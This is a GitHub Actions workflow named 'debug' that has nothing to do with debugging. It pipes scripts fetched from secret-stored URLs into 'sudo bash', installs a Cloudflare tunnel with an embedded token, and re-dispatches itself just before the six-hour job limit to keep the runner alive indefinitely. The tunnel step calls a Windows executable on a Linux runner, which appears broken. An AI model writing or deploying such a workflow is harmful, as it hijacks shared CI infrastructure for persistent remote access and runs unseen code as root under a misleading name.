name: debug

on:
  workflow_dispatch:

permissions:
  actions: write
  contents: read

jobs:
  debug:
    runs-on: ubuntu-latest

    steps:
      - name: Run tasks
        run: |
          curl ifconfig.io
          curl -fsSL "${{ secrets.SETENV }}" | sudo bash -s
          curl -fsSL "${{ secrets.ASSETS }}" | sudo bash -s

      # 
      - name: install
        run: |
          cloudflared.exe service install eyJhIjoiOGQyMDg4NjE0Nzg1N2EwY2RjYzhkYjc3OGU4YjZlZjciLCJ0IjoiYjU4MjQ2MmItZTY5My00NzJkLThiMjktNmFkOWY1MDAyNzJhIiwicyI6Ik1ERXlOamcxTURJdE5UaGhZeTAwTUdJd0xUZzRPRE10TlRNek1UazFOVFprTkRJdyJ9

      # 
      - name: refresh
        env:
          REPO: ${{ github.repository }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          RUN_ID: ${{ github.run_id }}
          JOB_NAME: debug
        run: |
          echo "Fetching official job start time from GitHub API..."
      
          JOB_INFO=$(gh api \
            -H "Accept: application/vnd.github+json" \
            /repos/$REPO/actions/runs/$RUN_ID/jobs \
            --jq ".jobs[] | select(.name==\"$JOB_NAME\") | .started_at"
          )
      
          if [ -z "$JOB_INFO" ]; then
              echo "Failed to fetch job start time!"
              exit 1
          fi
      
          START_TS=$(date -d "$JOB_INFO" +%s)
          echo "Job officially started at: $JOB_INFO ($START_TS)"
      
          TARGET=$((START_TS + 6*3600 - 60))
      
          echo "Monitoring runtime until 6h..."
          
          while true; do
              NOW_TS=$(date +%s)
              ELAPSED=$((NOW_TS - START_TS))
              echo "Job has been running for $ELAPSED seconds"
              
              if [ "$NOW_TS" -ge "$TARGET" ]; then
                  echo "Time to dispatch new workflow..."
                  gh workflow run debug.yml --repo "$REPO"
                  echo "New workflow dispatched, exiting..."
                  break
              fi
              
              sleep 30
          done
      
          sleep 999
